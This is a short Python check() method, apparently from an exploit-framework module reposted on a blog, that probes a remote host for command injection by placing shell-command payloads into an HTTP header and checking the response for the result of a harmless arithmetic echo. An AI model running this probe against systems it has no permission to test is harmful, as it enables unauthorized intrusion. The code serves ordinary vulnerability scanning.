def check(self):
number = int(random_text(6, alph=string.digits))
solution = number - 1
cmd = "echo $(({}-1))".format(number)
marker = random_text(32)
url = "{}:{}{}".format(self.target, self.port, self.path)
for payload in self.payloads:
injection = payload.replace("{{marker}}", marker).replace("{{cmd}}", cmd)
headers = {
self.header: injection,
}
response = http_request(method=self.method, url=url, headers=headers)
if response is None:
continue
if str(solution) in response.text:
self.valid = payload
return True # target is vulnerable
return False # target not vulnerable
评论列表
文章目录
